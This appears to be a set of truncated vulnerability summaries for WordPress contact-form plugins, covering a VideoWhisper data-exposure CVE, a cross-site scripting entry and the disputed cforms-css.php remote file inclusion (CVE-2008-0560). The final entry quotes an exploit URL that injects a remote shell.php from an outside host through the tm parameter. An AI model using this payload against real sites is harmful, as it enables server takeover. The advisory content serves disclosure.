CVE-2024-49235

CVE-2024-49235 affects VideoWhisper WordPress plugin components (Contact Forms, Live Support, CRM, Video Messages) up to version 1.10.2. The vulnerability is described as Insertion of Sensitive Information Into Sent Data, enabling retrieval of embedded sensitive data. CVSS v3.1 base score: 7.5 (H...

WordPress plugin ContactForms 跨站脚本漏洞

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. The platform supports personal blog sites on PHP and MySQL servers.WordPress plugin is an application plugin. A cross-site scripting vulnerability exists...

Remote file inclusion

PHP remote file inclusion vulnerability in cforms-css.php in Oliver Seidel cforms contactforms, a Wordpress plugin, allows remote attackers to execute arbitrary PHP code via a URL in the tm parameter. NOTE: CVE disputes this issue for 7.3, since there is no tm parameter, and the code exits with a...

CVE-2008-0560

CVE-2008-0560 affects the WordPress plugin cforms (Oliver Seidel cforms, also known as contactforms). The vulnerability is in cforms-css.php and allows remote attackers to execute arbitrary PHP code via a URL parameter tm, due to a PHP remote file inclusion. Several sources note that version 7.3 ...

contactforms "cforms-css.php" Remote File Inclusion

Discovery by: Sw33t h4cK3r ----------- Exploit : http://Example.com/contactforms/cforms-css.php?tm=http://site.com/shell.php...